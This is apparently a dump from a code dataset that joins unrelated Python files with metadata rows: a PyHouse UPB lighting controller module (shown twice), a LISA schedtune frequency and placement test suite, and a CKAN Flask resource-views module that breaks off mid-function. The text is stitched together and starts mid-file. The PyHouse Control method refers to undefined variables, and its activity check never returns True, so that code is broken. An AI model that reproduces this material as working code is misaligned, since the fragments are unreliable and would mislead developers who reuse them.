self.m_pyhouse_obj.Core.MqttApi.MqttPublish(l_topic, l_controller_obj) # /start
else:
LOG.error('Controller {} failed to start.'.format(l_controller_obj.Name))
# l_controller_obj.Active = False
LOG.info('Started {} UPB Controllers.'.format(l_count))
def Stop(self):
try:
for l_controller_obj in self.m_pyhouse_obj.House.Lighting.Controllers.values():
if lightingUtility._is_upb_active(l_controller_obj):
l_controller_obj._HandlerApi.Stop(l_controller_obj)
except AttributeError as e_err:
LOG.error('Stop ERROR {}'.format(e_err))
def SaveXml(self, p_xml):
"""
Not needed since the xml is taken care as a part of the device.
"""
return p_xml
def Control(self, p_device_obj, p_controller_obj, p_control):
LOG.debug('Change light Name:{}, Family.Name:{}'.format(p_light_obj.Name, p_light_obj.Family.Name))
self.m_plm.Control(p_light_obj, p_source, p_level)
# ## END
| 35.506173 | 107 | 0.650556 |
__updated__ = '2020-02-19'
from Modules.Families.UPB.UPB_Pim import Api as upbPimApi
from Modules.Core import logging_pyh as Logger
LOG = Logger.getLogger('PyHouse.UPB_device ')
class lightingUtility(object):
@staticmethod
def _is_upb_active(p_controller_obj):
if p_controller_obj.Family.Name != 'UPB':
return False
class Api(object):
def __init__(self, p_pyhouse_obj):
self.m_pyhouse_obj = p_pyhouse_obj
def Start(self):
l_count = 0
for l_controller_obj in self.m_pyhouse_obj.House.Lighting.Controllers.values():
if lightingUtility._is_upb_active(l_controller_obj):
l_controller_prefix = 'house/lighting/controllers/{}'.format(l_controller_obj.Name)
l_controller_obj._HandlerApi = upbPimApi(self.m_pyhouse_obj)
if l_controller_obj._HandlerApi.Start(self.m_pyhouse_obj, l_controller_obj):
LOG.info('Controller {} Started.'.format(l_controller_obj.Name))
l_count += 1
l_topic = 'house/lighting/controllers/' + l_controller_prefix + '/start'
self.m_pyhouse_obj.Core.MqttApi.MqttPublish(l_topic, l_controller_obj)
else:
LOG.error('Controller {} failed to start.'.format(l_controller_obj.Name))
LOG.info('Started {} UPB Controllers.'.format(l_count))
def Stop(self):
try:
for l_controller_obj in self.m_pyhouse_obj.House.Lighting.Controllers.values():
if lightingUtility._is_upb_active(l_controller_obj):
l_controller_obj._HandlerApi.Stop(l_controller_obj)
except AttributeError as e_err:
LOG.error('Stop ERROR {}'.format(e_err))
def SaveXml(self, p_xml):
return p_xml
def Control(self, p_device_obj, p_controller_obj, p_control):
LOG.debug('Change light Name:{}, Family.Name:{}'.format(p_light_obj.Name, p_light_obj.Family.Name))
self.m_plm.Control(p_light_obj, p_source, p_level)
| true | true |
1c3332fce4b39830bc48b6785450db2bd6c00c52 | 11,547 | py | Python | lisa/tests/staging/sched_android.py | credp/lisa | c87a9a3463d55dd28ff7bb705551529a4ffd4456 | [
"Apache-2.0"
] | 1 | 2021-07-03T23:45:09.000Z | 2021-07-03T23:45:09.000Z | lisa/tests/staging/sched_android.py | QPC-database/lisa | 9cc520a11192dea02240ddcf0df53bf6d6763411 | [
"Apache-2.0"
] | null | null | null | lisa/tests/staging/sched_android.py | QPC-database/lisa | 9cc520a11192dea02240ddcf0df53bf6d6763411 | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2019, Arm Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import os.path
import abc
from lisa.wlgen.rta import RTAPhase, PeriodicWload
from lisa.tests.base import TestBundleBase, TestBundle, ResultBundle, RTATestBundle, AggregatedResultBundle
from lisa.trace import requires_events
from lisa.target import Target
from lisa.utils import ArtifactPath, kwargs_forwarded_to
from lisa.analysis.frequency import FrequencyAnalysis
from lisa.analysis.tasks import TasksAnalysis
class SchedTuneItemBase(RTATestBundle, TestBundle):
"""
Abstract class enabling rtapp execution in a schedtune group
:param boost: The boost level to set for the cgroup
:type boost: int
:param prefer_idle: The prefer_idle flag to set for the cgroup
:type prefer_idle: bool
"""
def __init__(self, res_dir, plat_info, boost, prefer_idle):
super().__init__(res_dir, plat_info)
self.boost = boost
self.prefer_idle = prefer_idle
@property
def cgroup_configuration(self):
return self.get_cgroup_configuration(self.plat_info, self.boost, self.prefer_idle)
@classmethod
def get_cgroup_configuration(cls, plat_info, boost, prefer_idle):
attributes = {
'boost': boost,
'prefer_idle': int(prefer_idle)
}
return {'name': 'lisa_test',
'controller': 'schedtune',
'attributes': attributes}
@classmethod
# Not annotated, to prevent exekall from picking it up. See
# SchedTuneBase.from_target
def _from_target(cls, target, *, res_dir, boost, prefer_idle, collector=None):
plat_info = target.plat_info
rtapp_profile = cls.get_rtapp_profile(plat_info)
cgroup_config = cls.get_cgroup_configuration(plat_info, boost, prefer_idle)
cls.run_rtapp(target, res_dir, rtapp_profile, collector=collector, cg_cfg=cgroup_config)
return cls(res_dir, plat_info, boost, prefer_idle)
class SchedTuneBase(TestBundleBase):
"""
Abstract class enabling the aggregation of ``SchedTuneItemBase``
:param test_bundles: a list of test bundles generated by
multiple ``SchedTuneItemBase`` instances
:type test_bundles: list
"""
def __init__(self, res_dir, plat_info, test_bundles):
super().__init__(res_dir, plat_info)
self.test_bundles = test_bundles
@classmethod
@kwargs_forwarded_to(
SchedTuneItemBase._from_target,
ignore=[
'boost',
'prefer_idle',
]
)
def _from_target(cls, target: Target, *, res_dir: ArtifactPath = None,
collector=None, **kwargs) -> 'SchedTuneBase':
"""
Creates a SchedTuneBase bundle from the target.
"""
return cls(res_dir, target.plat_info,
list(cls._create_test_bundles(target, res_dir, **kwargs))
)
@classmethod
@abc.abstractmethod
def _create_test_bundles(cls, target, res_dir, **kwargs):
"""
Collects and yields a :class:`lisa.tests.base.ResultBundle` per test
item.
"""
pass
@classmethod
def _create_test_bundle_item(cls, target, res_dir, item_cls,
boost, prefer_idle, **kwargs):
"""
Creates and returns a TestBundle for a given item class, and a given
schedtune configuration
"""
item_dir = ArtifactPath.join(res_dir, f'boost_{boost}_prefer_idle_{int(prefer_idle)}')
os.makedirs(item_dir)
logger = cls.get_logger()
logger.info(f'Running {item_cls.__name__} with boost={boost}, prefer_idle={prefer_idle}')
return item_cls.from_target(target,
boost=boost,
prefer_idle=prefer_idle,
res_dir=item_dir,
**kwargs,
)
class SchedTuneFreqItem(SchedTuneItemBase):
"""
Runs a tiny RT rtapp task pinned to a big CPU at a given boost level and
checks the frequency selection was performed accordingly.
"""
@classmethod
def _get_rtapp_profile(cls, plat_info):
cpu = plat_info['capacity-classes'][-1][0]
return {
'stune': RTAPhase(
prop_wload=PeriodicWload(
# very small task, no impact on freq w/o boost
duty_cycle_pct=1,
duration=10,
period=cls.TASK_PERIOD,
),
# pin to big CPU, to focus on frequency selection
prop_cpus=[cpu],
# RT tasks have the boost holding feature so the frequency
# should be more stable, and we shouldn't go to max freq in
# Android
prop_policy='SCHED_FIFO'
)
}
@FrequencyAnalysis.df_cpu_frequency.used_events
@requires_events(SchedTuneItemBase.trace_window.used_events, "cpu_frequency")
def trace_window(self, trace):
"""
Set the boundaries of the trace window to ``cpu_frequency`` events
before/after the task's start/end time
"""
rta_start, rta_stop = super().trace_window(trace)
cpu = self.plat_info['capacity-classes'][-1][0]
freq_df = trace.analysis.frequency.df_cpu_frequency(cpu)
# Find the frequency events before and after the task runs
freq_start = freq_df[freq_df.index < rta_start].index[-1]
freq_stop = freq_df[freq_df.index > rta_stop].index[0]
return (freq_start, freq_stop)
@FrequencyAnalysis.get_average_cpu_frequency.used_events
def test_stune_frequency(self, freq_margin_pct=10) -> ResultBundle:
"""
Test that frequency selection followed the boost
:param: freq_margin_pct: Allowed margin between estimated and measured
average frequencies
:type freq_margin_pct: int
Compute the expected frequency given the boost level and compare to the
real average frequency from the trace.
Check that the difference between expected and measured frequencies is
no larger than ``freq_margin_pct``.
"""
kernel_version = self.plat_info['kernel']['version']
if kernel_version.parts[:2] < (4, 14):
self.get_logger().warning(f'This test requires the RT boost hold, but it may be disabled in {kernel_version}')
cpu = self.plat_info['capacity-classes'][-1][0]
freqs = self.plat_info['freqs'][cpu]
max_freq = max(freqs)
# Estimate the target frequency, including sugov's margin, and round
# into a real OPP
boost = self.boost
target_freq = min(max_freq, max_freq * boost / 80)
target_freq = list(filter(lambda f: f >= target_freq, freqs))[0]
# Get the real average frequency
avg_freq = self.trace.analysis.frequency.get_average_cpu_frequency(cpu)
distance = abs(target_freq - avg_freq) * 100 / target_freq
res = ResultBundle.from_bool(distance < freq_margin_pct)
res.add_metric("target freq", target_freq, 'kHz')
res.add_metric("average freq", avg_freq, 'kHz')
res.add_metric("boost", boost, '%')
return res
class SchedTuneFrequencyTest(SchedTuneBase):
"""
Runs multiple ``SchedTuneFreqItem`` tests at various boost levels ranging
from 20% to 100%, then checks all succedeed.
"""
@classmethod
def _create_test_bundles(cls, target, res_dir, **kwargs):
for boost in range(20, 101, 20):
yield cls._create_test_bundle_item(
target=target,
res_dir=res_dir,
item_cls=SchedTuneFreqItem,
boost=boost,
prefer_idle=False,
**kwargs
)
def test_stune_frequency(self, freq_margin_pct=10) -> AggregatedResultBundle:
"""
.. seealso:: :meth:`SchedTuneFreqItem.test_stune_frequency`
"""
item_res_bundles = [
item.test_stune_frequency(freq_margin_pct)
for item in self.test_bundles
]
return AggregatedResultBundle(item_res_bundles, 'boost')
class SchedTunePlacementItem(SchedTuneItemBase):
"""
Runs a tiny RT-App task marked 'prefer_idle' at a given boost level and
tests if it was placed on big-enough CPUs.
"""
@classmethod
def _get_rtapp_profile(cls, plat_info):
return {
'stune': RTAPhase(
prop_wload=PeriodicWload(
duty_cycle_pct=1,
duration=3,
period=cls.TASK_PERIOD,
)
)
}
@TasksAnalysis.df_task_total_residency.used_events
def test_stune_task_placement(self, bad_cpu_margin_pct=10) -> ResultBundle:
"""
Test that the task placement satisfied the boost requirement
Check that top-app tasks spend no more than ``bad_cpu_margin_pct`` of
their time on CPUs that don't have enough capacity to serve their
boost.
"""
assert len(self.rtapp_tasks) == 1
task = self.rtapp_tasks[0]
df = self.trace.analysis.tasks.df_task_total_residency(task)
# Find CPUs without enough capacity to meet the boost
boost = self.boost
cpu_caps = self.plat_info['cpu-capacities']['rtapp']
ko_cpus = list(filter(lambda x: (cpu_caps[x] / 10.24) < boost, cpu_caps))
# Count how much time was spend on wrong CPUs
time_ko = 0
total_time = 0
for cpu in cpu_caps:
t = df['runtime'][cpu]
if cpu in ko_cpus:
time_ko += t
total_time += t
pct_ko = time_ko * 100 / total_time
res = ResultBundle.from_bool(pct_ko < bad_cpu_margin_pct)
res.add_metric("time spent on inappropriate CPUs", pct_ko, '%')
res.add_metric("boost", boost, '%')
return res
class SchedTunePlacementTest(SchedTuneBase):
"""
Runs multiple ``SchedTunePlacementItem`` tests with prefer_idle set and
typical top-app boost levels, then checks all succedeed.
"""
@classmethod
def _create_test_bundles(cls, target, res_dir, **kwargs):
# Typically top-app tasks are boosted by 10%, or 50% during touchboost
for boost in [10, 50]:
yield cls._create_test_bundle_item(
target=target,
res_dir=res_dir,
item_cls=SchedTunePlacementItem,
boost=boost,
prefer_idle=True,
**kwargs
)
def test_stune_task_placement(self, margin_pct=10) -> AggregatedResultBundle:
"""
.. seealso:: :meth:`SchedTunePlacementItem.test_stune_task_placement`
"""
item_res_bundles = [
item.test_stune_task_placement(margin_pct)
for item in self.test_bundles
]
return AggregatedResultBundle(item_res_bundles, 'boost')
# vim :set tabstop=4 shiftwidth=4 textwidth=80 expandtab
| 35.097264 | 122 | 0.639993 |
import os
import os.path
import abc
from lisa.wlgen.rta import RTAPhase, PeriodicWload
from lisa.tests.base import TestBundleBase, TestBundle, ResultBundle, RTATestBundle, AggregatedResultBundle
from lisa.trace import requires_events
from lisa.target import Target
from lisa.utils import ArtifactPath, kwargs_forwarded_to
from lisa.analysis.frequency import FrequencyAnalysis
from lisa.analysis.tasks import TasksAnalysis
class SchedTuneItemBase(RTATestBundle, TestBundle):
def __init__(self, res_dir, plat_info, boost, prefer_idle):
super().__init__(res_dir, plat_info)
self.boost = boost
self.prefer_idle = prefer_idle
@property
def cgroup_configuration(self):
return self.get_cgroup_configuration(self.plat_info, self.boost, self.prefer_idle)
@classmethod
def get_cgroup_configuration(cls, plat_info, boost, prefer_idle):
attributes = {
'boost': boost,
'prefer_idle': int(prefer_idle)
}
return {'name': 'lisa_test',
'controller': 'schedtune',
'attributes': attributes}
@classmethod
def _from_target(cls, target, *, res_dir, boost, prefer_idle, collector=None):
plat_info = target.plat_info
rtapp_profile = cls.get_rtapp_profile(plat_info)
cgroup_config = cls.get_cgroup_configuration(plat_info, boost, prefer_idle)
cls.run_rtapp(target, res_dir, rtapp_profile, collector=collector, cg_cfg=cgroup_config)
return cls(res_dir, plat_info, boost, prefer_idle)
class SchedTuneBase(TestBundleBase):
def __init__(self, res_dir, plat_info, test_bundles):
super().__init__(res_dir, plat_info)
self.test_bundles = test_bundles
@classmethod
@kwargs_forwarded_to(
SchedTuneItemBase._from_target,
ignore=[
'boost',
'prefer_idle',
]
)
def _from_target(cls, target: Target, *, res_dir: ArtifactPath = None,
collector=None, **kwargs) -> 'SchedTuneBase':
return cls(res_dir, target.plat_info,
list(cls._create_test_bundles(target, res_dir, **kwargs))
)
@classmethod
@abc.abstractmethod
def _create_test_bundles(cls, target, res_dir, **kwargs):
pass
@classmethod
def _create_test_bundle_item(cls, target, res_dir, item_cls,
boost, prefer_idle, **kwargs):
item_dir = ArtifactPath.join(res_dir, f'boost_{boost}_prefer_idle_{int(prefer_idle)}')
os.makedirs(item_dir)
logger = cls.get_logger()
logger.info(f'Running {item_cls.__name__} with boost={boost}, prefer_idle={prefer_idle}')
return item_cls.from_target(target,
boost=boost,
prefer_idle=prefer_idle,
res_dir=item_dir,
**kwargs,
)
class SchedTuneFreqItem(SchedTuneItemBase):
@classmethod
def _get_rtapp_profile(cls, plat_info):
cpu = plat_info['capacity-classes'][-1][0]
return {
'stune': RTAPhase(
prop_wload=PeriodicWload(
duty_cycle_pct=1,
duration=10,
period=cls.TASK_PERIOD,
),
prop_cpus=[cpu],
# Android
prop_policy='SCHED_FIFO'
)
}
@FrequencyAnalysis.df_cpu_frequency.used_events
@requires_events(SchedTuneItemBase.trace_window.used_events, "cpu_frequency")
def trace_window(self, trace):
rta_start, rta_stop = super().trace_window(trace)
cpu = self.plat_info['capacity-classes'][-1][0]
freq_df = trace.analysis.frequency.df_cpu_frequency(cpu)
# Find the frequency events before and after the task runs
freq_start = freq_df[freq_df.index < rta_start].index[-1]
freq_stop = freq_df[freq_df.index > rta_stop].index[0]
return (freq_start, freq_stop)
@FrequencyAnalysis.get_average_cpu_frequency.used_events
def test_stune_frequency(self, freq_margin_pct=10) -> ResultBundle:
kernel_version = self.plat_info['kernel']['version']
if kernel_version.parts[:2] < (4, 14):
self.get_logger().warning(f'This test requires the RT boost hold, but it may be disabled in {kernel_version}')
cpu = self.plat_info['capacity-classes'][-1][0]
freqs = self.plat_info['freqs'][cpu]
max_freq = max(freqs)
# Estimate the target frequency, including sugov's margin, and round
boost = self.boost
target_freq = min(max_freq, max_freq * boost / 80)
target_freq = list(filter(lambda f: f >= target_freq, freqs))[0]
avg_freq = self.trace.analysis.frequency.get_average_cpu_frequency(cpu)
distance = abs(target_freq - avg_freq) * 100 / target_freq
res = ResultBundle.from_bool(distance < freq_margin_pct)
res.add_metric("target freq", target_freq, 'kHz')
res.add_metric("average freq", avg_freq, 'kHz')
res.add_metric("boost", boost, '%')
return res
class SchedTuneFrequencyTest(SchedTuneBase):
@classmethod
def _create_test_bundles(cls, target, res_dir, **kwargs):
for boost in range(20, 101, 20):
yield cls._create_test_bundle_item(
target=target,
res_dir=res_dir,
item_cls=SchedTuneFreqItem,
boost=boost,
prefer_idle=False,
**kwargs
)
def test_stune_frequency(self, freq_margin_pct=10) -> AggregatedResultBundle:
item_res_bundles = [
item.test_stune_frequency(freq_margin_pct)
for item in self.test_bundles
]
return AggregatedResultBundle(item_res_bundles, 'boost')
class SchedTunePlacementItem(SchedTuneItemBase):
@classmethod
def _get_rtapp_profile(cls, plat_info):
return {
'stune': RTAPhase(
prop_wload=PeriodicWload(
duty_cycle_pct=1,
duration=3,
period=cls.TASK_PERIOD,
)
)
}
@TasksAnalysis.df_task_total_residency.used_events
def test_stune_task_placement(self, bad_cpu_margin_pct=10) -> ResultBundle:
assert len(self.rtapp_tasks) == 1
task = self.rtapp_tasks[0]
df = self.trace.analysis.tasks.df_task_total_residency(task)
boost = self.boost
cpu_caps = self.plat_info['cpu-capacities']['rtapp']
ko_cpus = list(filter(lambda x: (cpu_caps[x] / 10.24) < boost, cpu_caps))
time_ko = 0
total_time = 0
for cpu in cpu_caps:
t = df['runtime'][cpu]
if cpu in ko_cpus:
time_ko += t
total_time += t
pct_ko = time_ko * 100 / total_time
res = ResultBundle.from_bool(pct_ko < bad_cpu_margin_pct)
res.add_metric("time spent on inappropriate CPUs", pct_ko, '%')
res.add_metric("boost", boost, '%')
return res
class SchedTunePlacementTest(SchedTuneBase):
@classmethod
def _create_test_bundles(cls, target, res_dir, **kwargs):
for boost in [10, 50]:
yield cls._create_test_bundle_item(
target=target,
res_dir=res_dir,
item_cls=SchedTunePlacementItem,
boost=boost,
prefer_idle=True,
**kwargs
)
def test_stune_task_placement(self, margin_pct=10) -> AggregatedResultBundle:
item_res_bundles = [
item.test_stune_task_placement(margin_pct)
for item in self.test_bundles
]
return AggregatedResultBundle(item_res_bundles, 'boost')
| true | true |
1c33333bbb025761b13dfdd9658ef772ab03d251 | 32,653 | py | Python | ckan/views/resource.py | end2end8x/ckan | 45ee306de2f667484b2d086519fb5335a73e36a5 | [
"Apache-2.0"
] | 58 | 2015-01-11T09:05:15.000Z | 2022-03-17T23:44:07.000Z | ckan/views/resource.py | end2end8x/ckan | 45ee306de2f667484b2d086519fb5335a73e36a5 | [
"Apache-2.0"
] | 1,467 | 2015-01-01T16:47:44.000Z | 2022-02-28T16:51:20.000Z | ckan/views/resource.py | end2end8x/ckan | 45ee306de2f667484b2d086519fb5335a73e36a5 | [
"Apache-2.0"
] | 17 | 2015-05-06T14:04:21.000Z | 2021-11-11T19:58:16.000Z | # encoding: utf-8
import cgi
import json
import logging
import flask
from flask.views import MethodView
import six
import ckan.lib.base as base
import ckan.lib.datapreview as lib_datapreview
import ckan.lib.helpers as h
import ckan.lib.navl.dictization_functions as dict_fns
import ckan.lib.uploader as uploader
import ckan.logic as logic
import ckan.model as model
import ckan.plugins as plugins
from ckan.common import _, g, request
from ckan.views.home import CACHE_PARAMETERS
from ckan.views.dataset import (
_get_pkg_template, _get_package_type, _setup_template_variables
)
Blueprint = flask.Blueprint
NotFound = logic.NotFound
NotAuthorized = logic.NotAuthorized
ValidationError = logic.ValidationError
check_access = logic.check_access
get_action = logic.get_action
tuplize_dict = logic.tuplize_dict
clean_dict = logic.clean_dict
parse_params = logic.parse_params
flatten_to_string_key = logic.flatten_to_string_key
log = logging.getLogger(__name__)
resource = Blueprint(
u'dataset_resource',
__name__,
url_prefix=u'/dataset/<id>/resource',
url_defaults={u'package_type': u'dataset'}
)
prefixed_resource = Blueprint(
u'resource',
__name__,
url_prefix=u'/dataset/<id>/resource',
url_defaults={u'package_type': u'dataset'}
)
def read(package_type, id, resource_id):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj,
u'for_view': True
}
try:
package = get_action(u'package_show')(context, {u'id': id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
activity_id = request.params.get(u'activity_id')
if activity_id:
# view an 'old' version of the package, as recorded in the
# activity stream
current_pkg = package
try:
package = context['session'].query(model.Activity).get(
activity_id
).data['package']
except AttributeError:
base.abort(404, _(u'Dataset not found'))
if package['id'] != current_pkg['id']:
log.info(u'Mismatch between pkg id in activity and URL {} {}'
.format(package['id'], current_pkg['id']))
# the activity is not for the package in the URL - don't allow
# misleading URLs as could be malicious
base.abort(404, _(u'Activity not found'))
# The name is used lots in the template for links, so fix it to be
# the current one. It's not displayed to the user anyway.
package['name'] = current_pkg['name']
# Don't crash on old (unmigrated) activity records, which do not
# include resources or extras.
package.setdefault(u'resources', [])
resource = None
for res in package.get(u'resources', []):
if res[u'id'] == resource_id:
resource = res
break
if not resource:
return base.abort(404, _(u'Resource not found'))
# get package license info
license_id = package.get(u'license_id')
try:
package[u'isopen'] = model.Package.get_license_register()[license_id
].isopen()
except KeyError:
package[u'isopen'] = False
resource_views = get_action(u'resource_view_list')(
context, {
u'id': resource_id
}
)
resource[u'has_views'] = len(resource_views) > 0
current_resource_view = None
view_id = request.args.get(u'view_id')
if resource[u'has_views']:
if view_id:
current_resource_view = [
rv for rv in resource_views if rv[u'id'] == view_id
]
if len(current_resource_view) == 1:
current_resource_view = current_resource_view[0]
else:
return base.abort(404, _(u'Resource view not found'))
else:
current_resource_view = resource_views[0]
# required for nav menu
pkg = context[u'package']
dataset_type = pkg.type or package_type
# TODO: remove
g.package = package
g.resource = resource
g.pkg = pkg
g.pkg_dict = package
extra_vars = {
u'resource_views': resource_views,
u'current_resource_view': current_resource_view,
u'dataset_type': dataset_type,
u'pkg_dict': package,
u'package': package,
u'resource': resource,
u'pkg': pkg, # NB it is the current version of the dataset, so ignores
# activity_id. Still used though in resource views for
# backward compatibility
u'is_activity_archive': bool(activity_id),
}
template = _get_pkg_template(u'resource_template', dataset_type)
return base.render(template, extra_vars)
def download(package_type, id, resource_id, filename=None):
"""
Provides a direct download by either redirecting the user to the url
stored or downloading an uploaded file directly.
"""
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
rsc = get_action(u'resource_show')(context, {u'id': resource_id})
get_action(u'package_show')(context, {u'id': id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
if rsc.get(u'url_type') == u'upload':
upload = uploader.get_resource_uploader(rsc)
filepath = upload.get_path(rsc[u'id'])
resp = flask.send_file(filepath)
if rsc.get(u'mimetype'):
resp.headers[u'Content-Type'] = rsc[u'mimetype']
return resp
elif u'url' not in rsc:
return base.abort(404, _(u'No download is available'))
return h.redirect_to(rsc[u'url'])
class CreateView(MethodView):
def post(self, package_type, id):
save_action = request.form.get(u'save')
data = clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.form)))
)
data.update(clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.files)))
))
# we don't want to include save as it is part of the form
del data[u'save']
resource_id = data.pop(u'id')
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
# see if we have any data that we are trying to save
data_provided = False
for key, value in six.iteritems(data):
if (
(value or isinstance(value, cgi.FieldStorage))
and key != u'resource_type'):
data_provided = True
break
if not data_provided and save_action != u"go-dataset-complete":
if save_action == u'go-dataset':
# go to final stage of adddataset
return h.redirect_to(u'{}.edit'.format(package_type), id=id)
# see if we have added any resources
try:
data_dict = get_action(u'package_show')(context, {u'id': id})
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to update dataset'))
except NotFound:
return base.abort(
404,
_(u'The dataset {id} could not be found.').format(id=id)
)
if not len(data_dict[u'resources']):
# no data so keep on page
msg = _(u'You must add at least one data resource')
# On new templates do not use flash message
errors = {}
error_summary = {_(u'Error'): msg}
return self.get(package_type, id, data, errors, error_summary)
# XXX race condition if another user edits/deletes
data_dict = get_action(u'package_show')(context, {u'id': id})
get_action(u'package_update')(
dict(context, allow_state_change=True),
dict(data_dict, state=u'active')
)
return h.redirect_to(u'{}.read'.format(package_type), id=id)
data[u'package_id'] = id
try:
if resource_id:
data[u'id'] = resource_id
get_action(u'resource_update')(context, data)
else:
get_action(u'resource_create')(context, data)
except ValidationError as e:
errors = e.error_dict
error_summary = e.error_summary
if data.get(u'url_type') == u'upload' and data.get(u'url'):
data[u'url'] = u''
data[u'url_type'] = u''
data[u'previous_upload'] = True
return self.get(package_type, id, data, errors, error_summary)
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to create a resource'))
except NotFound:
return base.abort(
404, _(u'The dataset {id} could not be found.').format(id=id)
)
if save_action == u'go-metadata':
# XXX race condition if another user edits/deletes
data_dict = get_action(u'package_show')(context, {u'id': id})
get_action(u'package_update')(
dict(context, allow_state_change=True),
dict(data_dict, state=u'active')
)
return h.redirect_to(u'{}.read'.format(package_type), id=id)
elif save_action == u'go-dataset':
# go to first stage of add dataset
return h.redirect_to(u'{}.edit'.format(package_type), id=id)
elif save_action == u'go-dataset-complete':
return h.redirect_to(u'{}.read'.format(package_type), id=id)
else:
# add more resources
return h.redirect_to(
u'{}_resource.new'.format(package_type),
id=id
)
def get(
self, package_type, id, data=None, errors=None, error_summary=None
):
# get resources for sidebar
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
pkg_dict = get_action(u'package_show')(context, {u'id': id})
except NotFound:
return base.abort(
404, _(u'The dataset {id} could not be found.').format(id=id)
)
try:
check_access(
u'resource_create', context, {u"package_id": pkg_dict["id"]}
)
except NotAuthorized:
return base.abort(
403, _(u'Unauthorized to create a resource for this package')
)
package_type = pkg_dict[u'type'] or package_type
errors = errors or {}
error_summary = error_summary or {}
extra_vars = {
u'data': data,
u'errors': errors,
u'error_summary': error_summary,
u'action': u'new',
u'resource_form_snippet': _get_pkg_template(
u'resource_form', package_type
),
u'dataset_type': package_type,
u'pkg_name': id,
u'pkg_dict': pkg_dict
}
template = u'package/new_resource_not_draft.html'
if pkg_dict[u'state'].startswith(u'draft'):
extra_vars[u'stage'] = ['complete', u'active']
template = u'package/new_resource.html'
return base.render(template, extra_vars)
class EditView(MethodView):
def _prepare(self, id):
context = {
u'model': model,
u'session': model.Session,
u'api_version': 3,
u'for_edit': True,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
check_access(u'package_update', context, {u'id': id})
except NotAuthorized:
return base.abort(
403,
_(u'User %r not authorized to edit %s') % (g.user, id)
)
return context
def post(self, package_type, id, resource_id):
context = self._prepare(id)
data = clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.form)))
)
data.update(clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.files)))
))
# we don't want to include save as it is part of the form
del data[u'save']
data[u'package_id'] = id
try:
if resource_id:
data[u'id'] = resource_id
get_action(u'resource_update')(context, data)
else:
get_action(u'resource_create')(context, data)
except ValidationError as e:
errors = e.error_dict
error_summary = e.error_summary
return self.get(
package_type, id, resource_id, data, errors, error_summary
)
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to edit this resource'))
return h.redirect_to(
u'{}_resource.read'.format(package_type),
id=id, resource_id=resource_id
)
def get(
self,
package_type,
id,
resource_id,
data=None,
errors=None,
error_summary=None
):
context = self._prepare(id)
pkg_dict = get_action(u'package_show')(context, {u'id': id})
try:
resource_dict = get_action(u'resource_show')(
context, {
u'id': resource_id
}
)
except NotFound:
return base.abort(404, _(u'Resource not found'))
if pkg_dict[u'state'].startswith(u'draft'):
return CreateView().get(package_type, id, data=resource_dict)
# resource is fully created
resource = resource_dict
# set the form action
form_action = h.url_for(
u'{}_resource.edit'.format(package_type),
resource_id=resource_id, id=id
)
if not data:
data = resource_dict
package_type = pkg_dict[u'type'] or package_type
errors = errors or {}
error_summary = error_summary or {}
extra_vars = {
u'data': data,
u'errors': errors,
u'error_summary': error_summary,
u'action': u'edit',
u'resource_form_snippet': _get_pkg_template(
u'resource_form', package_type
),
u'dataset_type': package_type,
u'resource': resource,
u'pkg_dict': pkg_dict,
u'form_action': form_action
}
return base.render(u'package/resource_edit.html', extra_vars)
class DeleteView(MethodView):
def _prepare(self, id):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
check_access(u'package_delete', context, {u'id': id})
except NotAuthorized:
return base.abort(
403,
_(u'Unauthorized to delete package %s') % u''
)
return context
def post(self, package_type, id, resource_id):
if u'cancel' in request.form:
return h.redirect_to(
u'{}_resource.edit'.format(package_type),
resource_id=resource_id, id=id
)
context = self._prepare(id)
try:
get_action(u'resource_delete')(context, {u'id': resource_id})
h.flash_notice(_(u'Resource has been deleted.'))
pkg_dict = get_action(u'package_show')(None, {u'id': id})
if pkg_dict[u'state'].startswith(u'draft'):
return h.redirect_to(
u'{}_resource.new'.format(package_type),
id=id
)
else:
return h.redirect_to(u'{}.read'.format(package_type), id=id)
except NotAuthorized:
return base.abort(
403,
_(u'Unauthorized to delete resource %s') % u''
)
except NotFound:
return base.abort(404, _(u'Resource not found'))
def get(self, package_type, id, resource_id):
context = self._prepare(id)
try:
resource_dict = get_action(u'resource_show')(
context, {
u'id': resource_id
}
)
pkg_id = id
except NotAuthorized:
return base.abort(
403,
_(u'Unauthorized to delete resource %s') % u''
)
except NotFound:
return base.abort(404, _(u'Resource not found'))
# TODO: remove
g.resource_dict = resource_dict
g.pkg_id = pkg_id
return base.render(
u'package/confirm_delete_resource.html', {
u'dataset_type': _get_package_type(id),
u'resource_dict': resource_dict,
u'pkg_id': pkg_id
}
)
def views(package_type, id, resource_id):
package_type = _get_package_type(id)
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'for_view': True,
u'auth_user_obj': g.userobj
}
data_dict = {u'id': id}
try:
check_access(u'package_update', context, data_dict)
except NotAuthorized:
return base.abort(
403,
_(u'User %r not authorized to edit %s') % (g.user, id)
)
# check if package exists
try:
pkg_dict = get_action(u'package_show')(context, data_dict)
pkg = context[u'package']
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
try:
